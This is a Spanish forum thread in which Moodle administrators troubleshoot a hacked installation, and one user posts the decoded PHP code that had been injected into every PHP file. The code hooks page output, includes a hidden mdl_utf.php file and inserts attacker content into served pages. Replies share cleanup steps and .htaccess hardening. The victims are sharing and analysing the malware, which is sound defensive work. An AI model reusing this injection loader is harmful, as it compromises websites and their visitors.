Sin tocar nada en Moodle, de repente, cuando quiero eliminar un recurso o moverlo o actualizarlo se queda la pantalla en blanco.
En la barra de direcciones pone por ejemplo:
.../moodle/course/mod.php?delete=1395&sesskey=291ge...&sr=3
Le ha pasado a alguien. Se habrá roto algo en la base datos??
Un saludo y gracias.
Estimados amigos. 
YA LO HE ARREGLADO. He puesto una copia que había hecho con antelación He RESTAURADO la carpeta Moodle.
Y os pongo lo que me ponía en todos los archivos con php que tenía en la carpeta moodle. A ver si alguién le ha pasado lo mismo o me puede explicar que es ese código que me aparece.
Un saludo.
Estimados amigos, he decodificado ese código y me sale esto:
if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('C:/wamp/www/moodle/lang/en_utf8/help/enrol/authorize/images/mdl_utf.php')){include_once('C:/wamp/www/moodle/lang/en_utf8/help/enrol/authorize/images/mdl_utf.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($d){$f=ord(substr($d,3,1));$h=10;$e=0;if($f&4){$e=unpack('v',substr($d,10,2));$e=$e[1];$h+=2+$e;}if($f&8){$h=strpos($d,chr(0),$h)+1;}if($f&16){$h=strpos($d,chr(0),$h)+1;}if($f&2){$h+=2;}$u=gzinflate(substr($d,$h));if($u===FALSE){$u=$d;}return $u;}}function dgobh($b){Header('Content-Encoding: none');$c=gzdecode($b);if(preg_match('/\]*\>)/si','$1'.gml(),$c);}else{return gml().$c;}}ob_start('dgobh');}}}
Alguién sabría explicarlo???
SALUDOS.
Es un ataque, es código de tarjetas de crédito falsas. Hay un montón de codigo falso.
Si alguien le pasa lo mismo que me lo diga.
Si, es un ataque al moodle. Creo que lo que hace es modificar las opciones de pago a través del moodle.
Vete a la carpeta: C:/wamp/www/moodle/lang/en_utf8/help/enrol/authorize/images/
y borra todo, menos 2 imágenes (alba.php cvv.png que son del propio moodle) y , porque ahí es donde guardan el código.
Según he leído por ahí ha sido un ataque a la seguridad del MOODLE.
Yo he puesto un firewall nuevo y he añadido la carpeta .htaccess para restringir la inyeción de código en la carpeta raíz de la web del moodle.
.htaccess
php_flag register_globals off
php_flag allow_url_fopen off
php_flag magic_quotes_gpc on
A ver si hay alguién que sepa más y nos pueda ayudar a prevenir estos ataques.
Por cierto mira en la lista de usuarios de tu moodle, a ver si te aparecen estos 2 elementos:
Faye O Horner/font>
keefrence keefrence
Que sospecho de ellos.
Un saludo.
Quiero añadir, que no sólo se me infectó el Moodle, también SPIP, ESCOMMERCE, y otras webs basadas en php. Tuve que restaurar todo.
Gracias, Prix Dekanun!! Su truco para editar y borrar recursos funciona!
A continuación edito sus palabras, para que se entienda mejor:
Un truco para borrar y editar los recursos con este problema es el siguiente: cuando le aparece la pantalla en blanco, elimine los últimos caracteres, a partir de los caracteres '&sr', por ejemplo, '&sr=1'
Hola a todos, me acaba de suceder lo mismo en Moodle 1.8.2.. ya borré los códigos de más de 100 phps..
Mis preguntas son:
- Con un upgrade se arreglará el asunto?? Por ejemplo instalar la 1.9.4?? y que se reemplacen los de la versión anterior??
- ¿Qué hacer en caso de éste ataque? solo con poner el
.htaccess
php_flag register_globals off
php_flag allow_url_fopen off
php_flag magic_quotes_gpc on
Asegurarémos un poco más nuestro moodle de inyección de código malicioso.
Saludos y muchas gracias.
David nuevamente gracias por los comentarios..
Pero realizando la sugerencia de cambiar los permisos del config.php, al quitarle los permisos del grupo (705), moodle solo me muestra la pantalla en blanco, sin embargo al darle los permisos de grupo solo lectura (745) y la plataforma hasta donde la he revisado funciona perfecta.
Me despido para empezar a hacer el upgrade...
Muchas gracias y estamos en contacto..
ERROR.jpg
